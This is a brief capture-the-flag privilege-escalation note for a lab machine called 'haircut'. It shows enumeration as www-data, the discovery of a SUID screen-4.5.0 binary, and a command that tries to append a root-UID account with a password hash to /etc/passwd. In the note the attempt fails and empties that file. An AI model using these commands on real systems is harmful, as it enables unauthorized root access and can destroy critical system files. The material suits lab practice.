3 box enum www-data

www-data@haircut:~/html/uploads$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash

SuidEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/screen-4.5.0
------------------------------

www-data@haircut:~/html/uploads$ screen --version
Screen version 4.05.00 (GNU) 10-Dec-16

https://gtfobins.github.io/gtfobins/screen/
# need to set xterm

LFILE="/etc/passwd"
/usr/bin/screen-4.5.0 -L $LFILE echo "kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash"
ERROR => getpwuid() can't identify your account!

www-data@haircut:~/html/uploads$ file /etc/passwd
/etc/passwd: empty
# it is not appending

Last updated